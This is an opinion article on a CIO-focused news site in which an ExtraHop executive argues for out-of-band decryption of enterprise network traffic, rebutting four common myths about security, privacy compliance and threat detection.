• About
  • Subscribe
  • Contact
Friday, May 9, 2025
    Login
  • Management Leadership
    • Growth Strategies
    • Finance
    • Operations
    • Sales and Marketing
    • Careers
  • Technology
    • Infrastructure and Platforms
    • Business Applications and Databases
    • Big Data, Analytics and Intelligence
    • Security
  • Industry Verticals
    • Finance and Insurance
    • Manufacturing
    • Logistics and Transportation
    • Retail and Wholesale
    • Hospitality and Tourism
    • Government and Public Services
    • Utilities
    • Media and Telecommunications
  • Resources
    • Whitepapers
    • PodChats
    • Videos
  • Events
No Result
View All Result
  • Management Leadership
    • Growth Strategies
    • Finance
    • Operations
    • Sales and Marketing
    • Careers
  • Technology
    • Infrastructure and Platforms
    • Business Applications and Databases
    • Big Data, Analytics and Intelligence
    • Security
  • Industry Verticals
    • Finance and Insurance
    • Manufacturing
    • Logistics and Transportation
    • Retail and Wholesale
    • Hospitality and Tourism
    • Government and Public Services
    • Utilities
    • Media and Telecommunications
  • Resources
    • Whitepapers
    • PodChats
    • Videos
  • Events
No Result
View All Result
No Result
View All Result
Home Technology Security

Decryption has become critical for cybersecurity teams

Daniel Chu by Daniel Chu
July 27, 2022
Photo by cottonbro from Pexels: https://www.pexels.com/photo/photo-of-cryptic-character-codes-7319085/

Photo by cottonbro from Pexels: https://www.pexels.com/photo/photo-of-cryptic-character-codes-7319085/

Strong encryption is critical to protecting sensitive business and personal data. Google estimates that 95% of its internet traffic uses the encrypted HTTPS protocol, and most industry analyst firms conclude that between 80 to 90% of network traffic is encrypted today.

The bottom line is that failing to encrypt traffic can lead to incidents as we saw when a Singapore clinic suffered a leak that compromised the personal data of over 70,000 patients and clinic information and interrupted business operations.

However, organisations committed to data privacy are not the only ones who see value in obscuring their digital footprint in encrypted traffic. Cybercriminals have been quick to weaponize encryption as a means to hide their malicious activity in otherwise benign traffic.

In recent years, security researchers have seen an increase in sophisticated attack techniques leveraging encrypted channels. This often leverages commonly abused Microsoft protocols, such as SMBv3, Active Directory, Kerberos, Microsoft Remote Procedure Call (MS-RPC), NTLM, LDAP, WINRM, in addition to TLS 1.3.

All of this has catalysed the need for a new approach when it comes to detecting threats within encrypted traffic: namely, decryption. Decryption can detect post-compromise activity that encrypted traffic analysis (ETA) misses, including ransomware campaigns that exploit the PrintNightmare vulnerability.

Today, it’s nearly impossible to tell the good from the bad without the ability to decrypt traffic securely. The ability to remain invisible has given cyberattackers the upper hand. Encrypted traffic has been exploited in some of the most significant cyberattacks and exploits techniques of the past year, from Sunburst and Kaseya to PrintNightmare, ProxyLogon, and the recent high-profile Log4J attacks.

Attack techniques such as living-off-the-land and Golden Ticket attacks are only successful because attackers can exploit organisations’ encrypted traffic. Ransomware is also top of mind for businesses right now. With only 31% of Singapore businesses stating they can identify and block ransomware, just as many are crippled by the fact that they cannot see what is happening laterally within their network perimeter.

Organisations have been wary to embrace decryption due to concerns around compliance, privacy, and security, as well as performance impacts and high computing costs. But there are ways to decrypt the traffic without compromising compliance, security, privacy, or performance. Let’s debunk some of the common myths and misconceptions.

Myth 1: Decryption weakens security

Truth: There are two main kinds of decryption: Out-of-band and in-line. In-line decryption, also known as SSL interception or man-in-the-middle (MitM), is an older approach that can result in organisations experiencing additional complications and costs by deploying additional in-line interception devices accompanied by cumbersome certificate management.

Out-of-band decryption is an elegant solution with its ability to automatically gather dynamic key details (session secrets) from the encryption termination endpoint (typically the server-side). This alleviates the need to add additional deployment complexities, costs, and risks historically associated with network decryption in the enterprise.

Myth 2: Decryption violates privacy laws & compliance standards

Truth: Decryption of enterprise network traffic does not violate privacy regulations or laws, and helps organisations stay compliant with data privacy legislation. Malaysia's Personal Data Protection Act (PDPA) only goes so far as to state that user data should not be misused and misapplied.

Meanwhile, Singapore's PDPA establishes a baseline to work alongside sector-specific legislative and regulatory frameworks, encompassing the collection, use, disclosure, and care of personal data.

This puts a big responsibility on businesses to secure traffic where forensic auditing is required or to investigate incidents on critical systems — such as customer databases or systems housing valuable intellectual property.

However, this is at risk by encrypted attacks, where advanced attackers use techniques like privilege escalation and exploiting encrypted protocols to slip under the radar. These are viable means for threat actors to rapidly distribute ransomware or other malicious files without detection, as well as exfiltrate data.

This is where decryption systems that do not write decrypted payload data to disk are crucial, as they empower real-time traffic analysis that then discards session keys unless continuous packet capture is deployed. Optionally, for an approach that is safer than sharing the long-term private key with analysts, businesses can also go with solutions that allow configurations that store the session key with packets.

Myth 3: Threat detection doesn’t require decryption

Truth: Encrypted traffic has emerged as a global trend for cyberattackers to evade detection. Among others, encrypted traffic attacks can hide during both the initial intrusion and lateral movement stages and can also cloak post-compromise activity from most security detection and investigation tools.

Decryption becomes essential for organisations with public-facing websites and web services For instance, exploits such as SQL injections, cross-site scripting, and Log4J can only be effectively detected and investigated in real-time and with great detail when the traffic is decrypted, and the payload is analysed.

At the midgame stages of an attack, decryption is necessary to understand lateral movement behaviours leveraging Microsoft protocols as well as communications with critical assets such as backend database communications. The ability to decrypt network communications will bolster visibility that is just not possible without decryption.

Attackers can encrypt their connections to victims to hide their activity from firewalls, intrusion detection systems, and proxies, to laterally move across the network. Additionally, adversaries often use encryption technologies to work with applications and tools that are already on victims' machines, making secure connections from compromised devices to new targets.

Myth 4: Encrypted traffic provides no benefit to attackers

Truth: While most companies use encryption to ensure the privacy of their data, cybercriminals have also become adept at using the same technology to cover up their tracks.

The benefits of decrypting network traffic are many. First, decryption enables the detection of attacks earlier in an attack campaign because malicious payloads are no longer hidden.

Second, decryption reduces the mean-time-to-response because it provides valuable context to ensure rapid detection, scoping, investigation, and remediation of threats. And finally, decryption allows full forensic records necessary for detailed post-compromise investigations.

Related:  Malicious player selling stolen data detected 
Tags: cybersecuritydecryptionExtraHop
Daniel Chu

Daniel Chu

Daniel Chu is the Vice President of Systems Engineering for APJ at ExtraHop. Spearheading the initial launch of ExtraHop APAC in 2015, he continues to be passionate about engaging in hands-on work and providing technical guidance to customers and partners. Prior to joining ExtraHop, Chu led a regional sales engineering team in Asia-Pacific & Japan at Riverbed Technology. He holds a Masters of Science and undergraduate degree in Electrical Engineering from the Georgia Institute of Technology.

No Result
View All Result

Recent Posts

  • APAC CIOs rethink cybersecurity investments amid expanding threat landscape
  • Study finds almost half of businesses bank on AI-enabled cybersecurity for EDR and XDR
  • AI drives cloud market growth in Q1
  • ARTHALAND chooses OutSystems to advance real estate sustainability
  • Experts warn against AI-powered deepfake impersonation scams

Live Poll

Categories

  • Big Data, Analytics & Intelligence
  • Business Applications & Databases
  • Business-IT Alignment
  • Careers
  • Case Studies
  • CISO
  • CISO strategies
  • Cloud, Virtualization, Operating Environments and Middleware
  • Computer, Storage, Networks, Connectivity
  • Corporate Social Responsibility
  • Customer Experience / Engagement
  • Cyber risk management
  • Cyberattacks and data breaches
  • Cybersecurity careers
  • Cybersecurity operations
  • Education
  • Education
  • Finance
  • Finance & Insurance
  • FutureCISO
  • General
  • Governance, Risk and Compliance
  • Government and Public Services
  • Growth Strategies
  • Hospitality & Tourism
  • HR, education and Training
  • Industry Verticals
  • Infrastructure & Platforms
  • Insider threats
  • Latest Stories
  • Logistics & Transportation
  • Management Leadership
  • Manufacturing
  • Media and Telecommunications
  • News Stories
  • Operations
  • Opinion
  • Opinions
  • People
  • Process
  • Remote work
  • Retail & Wholesale
  • Sales & Marketing
  • Security
  • Tactics and Strategies
  • Technology
  • Utilities
  • Videos
  • Vulnerabilities and threats
  • White Papers

Strategic Insights for Chief Information Officers

FutureCIO is about enabling the CIO, his team, the leadership and the enterprise through shared expertise, know-how and experience - through a community of shared interests and goals. It is also about discovering unknown best practices that will help realize new business models.

Quick Links

  • Videos
  • Resources
  • Subscribe
  • Contact

Cxociety Media Brands

  • FutureIoT
  • FutureCFO
  • FutureCIO

Categories

  • Privacy Policy
  • Terms of Use
  • Cookie Policy

Copyright © 2022 Cxociety Pte Ltd | Designed by Pixl

Login to your account below

or

Not a member yet? Register here

Forgotten Password?

Fill the forms bellow to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In
No Result
View All Result
  • Management Leadership
    • Growth Strategies
    • Finance
    • Operations
    • Sales and Marketing
    • Careers
  • Technology
    • Infrastructure and Platforms
    • Business Applications and Databases
    • Big Data, Analytics and Intelligence
    • Security
  • Industry Verticals
    • Finance and Insurance
    • Manufacturing
    • Logistics and Transportation
    • Retail and Wholesale
    • Hospitality and Tourism
    • Government and Public Services
    • Utilities
    • Media and Telecommunications
  • Resources
    • Whitepapers
    • PodChats
    • Videos
  • Events
Login

Copyright © 2022 Cxociety Pte Ltd | Designed by Pixl

Subscribe